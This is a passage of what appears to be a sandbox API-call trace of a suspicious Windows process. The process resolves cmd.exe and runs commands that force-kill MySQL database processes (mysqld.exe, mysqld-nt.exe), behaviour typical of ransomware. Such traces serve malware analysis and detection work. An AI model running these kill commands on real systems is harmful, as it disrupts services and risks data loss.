ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0186.682] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0186.682] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x124471d8 | out: lpFileInformation=0x124471d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0186.682] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0186.682] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x12447228 | out: lpFileInformation=0x12447228*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0186.683] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0186.683] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x12447278 | out: lpFileInformation=0x12447278*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0186.683] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0186.683] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x124472c8 | out: lpFileInformation=0x124472c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0186.683] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0186.683] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x12447318 | out: lpFileInformation=0x12447318*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0186.683] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0186.683] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x12447368 | out: lpFileInformation=0x12447368*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0186.683] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0186.684] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x124473b8 | out: lpFileInformation=0x124473b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0186.684] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0186.684] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x12447408 | out: lpFileInformation=0x12447408*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0186.684] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0186.684] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123bbc70, nSize=0x64 | out: lpBuffer="") returned 0x63 [0186.684] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12447458 | out: lpFileInformation=0x12447458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0186.684] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123bbd40, nSize=0x64 | out: lpBuffer="") returned 0x35 [0186.684] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124474a8 | out: lpFileInformation=0x124474a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0186.685] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0186.685] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0186.685] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0186.685] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0186.685] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0186.685] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0186.685] GetEnvironmentStringsW () returned 0x8ea900* [0186.686] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0186.686] GetCurrentProcess () returned 0xffffffff [0186.686] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x140, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124492c0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124492c0*=0x144) returned 1 [0186.686] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124492c4, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124492c4*=0x154) returned 1 [0186.686] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124492c8, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124492c8*=0x158) returned 1 [0186.687] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im mysqld.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12463500, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x144, hStdOutput=0x154, hStdError=0x158), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im mysqld.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x13c, hThread=0x130, dwProcessId=0x1280, dwThreadId=0xeb0)) returned 1 [0186.731] SetEvent (hEvent=0x150) returned 1 [0186.731] CloseHandle (hObject=0x130) returned 1 [0186.731] CloseHandle (hObject=0x158) returned 1 [0186.731] CloseHandle (hObject=0x154) returned 1 [0186.731] CloseHandle (hObject=0x144) returned 1 [0186.732] CloseHandle (hObject=0x140) returned 1 [0186.732] CloseHandle (hObject=0x134) returned 1 [0186.732] CloseHandle (hObject=0x138) returned 1 [0186.732] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0190.767] SetEvent (hEvent=0x150) returned 1 [0190.767] GetExitCodeProcess (in: hProcess=0x13c, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0190.767] GetProcessTimes (in: hProcess=0x13c, lpCreationTime=0x1245cde0, lpExitTime=0x1245cde8, lpKernelTime=0x1245cdf0, lpUserTime=0x1245cdf8 | out: lpCreationTime=0x1245cde0, lpExitTime=0x1245cde8, lpKernelTime=0x1245cdf0, lpUserTime=0x1245cdf8) returned 1 [0190.768] CloseHandle (hObject=0x13c) returned 1 [0190.768] SetEvent (hEvent=0x128) returned 1 [0190.768] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0190.784] SetEvent (hEvent=0x150) returned 1 [0190.784] SetEvent (hEvent=0x128) returned 1 [0190.784] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e9ba0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0190.785] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12451048 | out: lpFileInformation=0x12451048*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0190.785] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0190.785] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x12451098 | out: lpFileInformation=0x12451098*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0190.785] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0190.786] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x124510e8 | out: lpFileInformation=0x124510e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0190.786] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0190.786] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x12451138 | out: lpFileInformation=0x12451138*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0190.786] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0190.786] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x12451188 | out: lpFileInformation=0x12451188*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0190.786] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0190.786] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x124511d8 | out: lpFileInformation=0x124511d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0190.786] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0190.786] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x12451228 | out: lpFileInformation=0x12451228*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0190.786] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0190.786] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x12451278 | out: lpFileInformation=0x12451278*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0190.786] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0190.787] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x124512c8 | out: lpFileInformation=0x124512c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0190.787] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0190.787] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x12451318 | out: lpFileInformation=0x12451318*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0190.787] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0190.787] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x12451368 | out: lpFileInformation=0x12451368*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0190.787] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0190.787] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x124513b8 | out: lpFileInformation=0x124513b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0190.787] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0190.787] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123e9c70, nSize=0x64 | out: lpBuffer="") returned 0x63 [0190.787] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12451408 | out: lpFileInformation=0x12451408*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0190.788] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e9d40, nSize=0x64 | out: lpBuffer="") returned 0x35 [0190.788] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12451458 | out: lpFileInformation=0x12451458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0190.788] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x13c [0190.788] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0190.788] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0190.788] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0190.788] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0190.788] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0190.788] GetEnvironmentStringsW () returned 0x8ea900* [0190.789] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0190.790] GetCurrentProcess () returned 0xffffffff [0190.790] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x13c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124571d0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124571d0*=0x140) returned 1 [0190.790] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124571d4, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124571d4*=0x144) returned 1 [0190.790] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124571d8, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124571d8*=0x154) returned 1 [0190.790] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im mysqld-nt.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x1246f500, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, 